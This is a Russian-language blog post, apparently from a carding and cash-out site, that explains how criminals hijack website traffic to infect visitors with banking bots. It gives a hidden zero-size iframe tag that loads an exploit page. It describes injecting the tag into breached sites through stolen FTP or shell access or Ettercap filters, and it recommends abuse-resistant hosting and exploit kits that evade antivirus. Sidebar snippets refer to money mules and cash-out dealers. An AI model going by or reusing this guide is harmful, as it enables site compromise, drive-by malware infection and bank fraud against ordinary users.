Skip to main content

Кому и зачем нужен iFrame трафик и причем тут реальные заливщики и обнал


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>

где:

http://site.ru/sploit.php - это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

Чем рискуют дропы и нальщики принимая заливы на свои карты

Зам.начальника управления Следственного департамента МВД Павел Сычев рассказал о криминальном бизнесе «нальщиков» - Глава Банка России Эльвира Набиуллина заявила о снижении объемов теневого оборота в конце 2013 года. Что показывает ваша статистика по выявлению незаконных операций? - В последние годы объем денежных средств, выведенных в теневой сектор, увеличивался, и криминогенная обстановка ухудшалась. Проблема находится в поле зрения президента -  в декабрьском послании Федеральному Собранию, он призвал избавить нашу финансовую систему от разного рода «отмывочных контор» и так называемых «прачечных». Оперативники уже получили ориентировку на более активное выявление этих преступлений. П о уголовным делам, расследованным МВД только в первом полугодии 2013 года, проходит 145 млрд рублей, обналиченных и незаконно выведенных заграницу. Это неуплаченные налоги, незаконный бизнес, хищения, взятки. Финансовый доход посредников от этих операций составил 8 млрд рублей. Расследовано 89

М9 - точка обмена трафиком • Московский INTERNET EXCHANGE • MSK-XI

Вот так всё начиналось Изначально был всего один провайдер - Релком. Не было конкурентов - не было проблем. Рунет еще делал свои первые шаги, и все русскоязычные ресурсы были сосредоточены в одном месте. Позже Релком развалился на Релком и Демос, стали появляться другие провайдеры. Рунет тем временем подрос и... распался на множество отдельных сетей-сегментов, контролируемых разными провайдерами. Разумеется, конечные пользователи имели доступ ко всем ресурсам рунета, но прямого взаимодействия между провайдерами не было. Поэтому трафик шел с сервера одного провайдера по огромной петле через Америку, потом Германию, и только потом возвращался на сервер другого провайдера. Имела место неоправданная потеря и в скорости, и в деньгах. Пока трафик был незначительным, это мало кого волновало, но интернет бурно развивался, трафик по рунету стремительно увеличивался, и в один прекрасный день крупные провайдеры Москвы (по сути, Демос и Релком) сели друг напротив друга и решили, что им надо нал

Как работает банк со своими корреспондентами по SWIFT

Итак, наш банк имеет открытые корреспондентские счета в США (CITIBANK N.A. NEW YORK), в Европе (VTB BANK DEUTSCHLAND AG), в России (Промсвязьбанк Москва и Собинбанк Москва). Соответственно, все расследования по платежам происходят через эти банки согласно  установленным корреспондентским отношениям с использованием соответствующих форматов SWIFT MT-195/295, MT-196/296, MT-199/299 и MT-192/292 Кроме прямых корреспондентских отношений с банками, нашим банком установлены отношения и с другими финансовыми организациями через процедуру обмена ключами, что даёт возможность использовать SWIFT-форматы МТ-195, МТ-196 и МТ-199 для проведения процедуры расследования по стандартным платежам и платежам с покрытием: - DEUTSCHE BANK TRUST COMPANY AMERICAS USA - COMMERZBANK AG Germany - CITIBANK N.A. London - CITIBANK N.A. Brussels - BANQUE DE COMMERCE ET DE PLACEMENTS S.A. Geneva - NORVIK BANKA JSC  LV - ABLV BANK AS  LV В среднем процедура расследования занимает от 3 до 14 дней (е

Black Hat SEO или бот для скликивания контекстной рекламы

На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ   Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы.  Win32/Patched.P Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google , который был реализован в троянской программе Win32

Как найти реального заливщика

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево , но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли? Ко мне начал обращаться народ обращается разных категорий 1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса  2. Реальные мэны, которые  льют сразу большую сумму по SWIFT  без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личност

Understanding structured settlement loans

Structured Settlement loans can be obtained from all the states now with incredible benefits. Mostly, structured settlements are taken by people to receive compensation from companies or individuals after a certain lawsuit have been filed. Such compensation is paid over a period of set time and in equal installments. These installments are mostly paid as a form of insurance agreement that can also be used as collateral while applying for certain type of loans. If you want to apply for this loan, the process is extremely easy where you just need to consider few factors before going for it.  Prerequisites  Whenever you are applying for a loan, make sure what kind of structured settlement you currently have as different settlements can be applicable only for certain types of loan. You have to make sure that the agreement that you have signed on the structured settlement deal states this settlement as a part of your collateral security that can be shown to the banks for the loan. Eit